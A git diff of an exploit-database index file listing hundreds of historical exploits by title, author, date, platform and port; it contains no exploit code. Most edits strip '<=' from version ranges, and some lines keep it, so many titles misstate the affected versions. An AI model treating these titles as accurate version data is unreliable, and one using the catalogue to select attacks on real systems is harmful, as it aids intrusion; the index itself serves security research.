diff --git a/files.csv b/files.csv index e6729db76..7b886c8cf 100755 --- a/files.csv +++ b/files.csv @@ -4,48 +4,48 @@ id,file,description,date,author,platform,type,port 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 -6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 - (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 +6,platforms/php/webapps/6.php,"WordPress 2.0.2 - (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 -10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 +10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC (1)",2015-05-19,Garage4Hackers,windows,dos,0 -11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 +11,platforms/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 -15,platforms/osx/local/15.c,"Mac OS X <= 10.2.4 - DirectoryService (PATH) Local Root Exploit",2003-04-18,"Neeko Oni",osx,local,0 -16,platforms/linux/remote/16.c,"PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 +15,platforms/osx/local/15.c,"Mac OS X 10.2.4 - DirectoryService (PATH) Local Root Exploit",2003-04-18,"Neeko Oni",osx,local,0 +16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service Exploit",2003-04-22,"Tom Ferris",windows,dos,0 -18,platforms/linux/remote/18.sh,"Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 -19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723 +18,platforms/linux/remote/18.sh,"Snort 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 +19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723 20,platforms/windows/remote/20.txt,"Microsoft Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Local Root Exploit",2003-04-29,Xpl017Elz,linux,local,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service Proof of Concept",2003-04-29,aT4r,windows,dos,0 23,platforms/windows/remote/23.c,"Real Server < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 -24,platforms/linux/remote/24.c,"Sendmail <= 8.12.8 - prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 -25,platforms/linux/remote/25.c,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 -26,platforms/linux/remote/26.sh,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 +24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 +25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 +26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution Exploit",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Local Root Exploit",2003-05-12,bob,bsd,local,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution Exploit",2003-05-12,anonymous,windows,remote,0 -31,platforms/linux/local/31.pl,"CdRecord <= 2.0 - Mandrake Local Root Exploit",2003-05-14,anonymous,linux,local,0 +31,platforms/linux/local/31.pl,"CdRecord 2.0 - Mandrake Local Root Exploit",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 -38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 +38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 40,platforms/linux/local/40.pl,"/usr/mail (Mandrake Linux 8.2) - Local Exploit",2003-06-10,anonymous,linux,local,0 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25 -43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21 +43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25 -47,platforms/php/webapps/47.c,"phpBB 2.0.4 - Remote php File Include Exploit",2003-06-30,Spoofed,php,webapps,0 +47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion Exploit",2003-06-30,Spoofed,php,webapps,0 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 @@ -66,7 +66,7 @@ id,file,description,date,author,platform,type,port 65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80 -68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 +68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 69,platforms/windows/remote/69.c,"Microsoft Windows RPC - DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 @@ -83,12 +83,12 @@ id,file,description,date,author,platform,type,port 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 -84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 - FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 +84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 -91,platforms/linux/local/91.c,"Stunnel <= 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 +91,platforms/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - DoS",2003-09-08,badpack3t,multiple,dos,80 @@ -96,7 +96,7 @@ id,file,description,date,author,platform,type,port 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 -99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 +99,platforms/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 @@ -112,11 +112,11 @@ id,file,description,date,author,platform,type,port 113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit",2003-10-31,"Angelo Rosiello",linux,dos,0 -116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 +116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 -120,platforms/linux/local/120.c,"TerminatorX <= 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0 +120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0 121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 @@ -126,49 +126,49 @@ id,file,description,date,author,platform,type,port 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) (1)",2003-12-02,"Christophe Devine",linux,local,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 -131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 +131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 -138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 +138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 140,platforms/linux/local/140.c,"Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)",2004-01-06,"Christophe Devine",linux,local,0 -142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0 -143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 +141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)",2004-01-06,"Christophe Devine",linux,local,0 +142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0 +143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 -145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0 -146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 +145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0 +146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 -152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 +152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 -154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)",2004-02-18,"Christophe Devine",linux,local,0 +154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 -159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 -160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)",2004-03-01,"Paul Starzetz",linux,local,0 -161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 +159,platforms/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 +160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)",2004-03-01,"Paul Starzetz",linux,local,0 +161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0 164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 -165,platforms/windows/remote/165.c,"WS_FTP Server <= 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 +165,platforms/windows/remote/165.c,"WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 -169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0 +169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Exploit",2004-03-28,blackangels,hardware,remote,0 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 171,platforms/linux/remote/171.c,"tcpdump ISAKMP Identification payload Integer Overflow Exploit",2004-04-05,Rapid7,linux,remote,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow Exploit",2004-04-07,I2S-LaB,windows,local,0 -173,platforms/linux/remote/173.pl,"Monit <= 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812 -174,platforms/linux/remote/174.c,"Monit <= 4.2 - Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812 -175,platforms/windows/remote/175.pl,"eMule <= 0.42d - IRC Remote Buffer Overflow Exploit",2004-04-12,kingcope,windows,remote,0 +173,platforms/linux/remote/173.pl,"Monit 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812 +174,platforms/linux/remote/174.c,"Monit 4.2 - Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812 +175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow Exploit",2004-04-12,kingcope,windows,remote,0 176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 178,platforms/linux/local/178.c,"traceroute - Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 @@ -232,7 +232,7 @@ id,file,description,date,author,platform,type,port 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 -244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 +244,platforms/linux/dos/244.java,"ProFTPD 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 @@ -244,7 +244,7 @@ id,file,description,date,author,platform,type,port 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 -258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 +258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 @@ -259,7 +259,7 @@ id,file,description,date,author,platform,type,port 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 -274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - 'setsockopt' Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0 +274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0 275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53 @@ -285,11 +285,11 @@ id,file,description,date,author,platform,type,port 300,platforms/multiple/remote/300.c,"CVS - Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow Exploit",2004-06-25,anonymous,solaris,remote,2401 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit",2004-06-25,anonymous,unix,local,0 -303,platforms/linux/remote/303.pl,"Borland Interbase <= 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 +303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local DoS Exploit",2004-06-25,lorenzo,linux,dos,0 -307,platforms/linux/remote/307.py,"rlpr <= 2.04 - msg() Remote Format String Exploit",2004-06-25,jaguar,linux,remote,7290 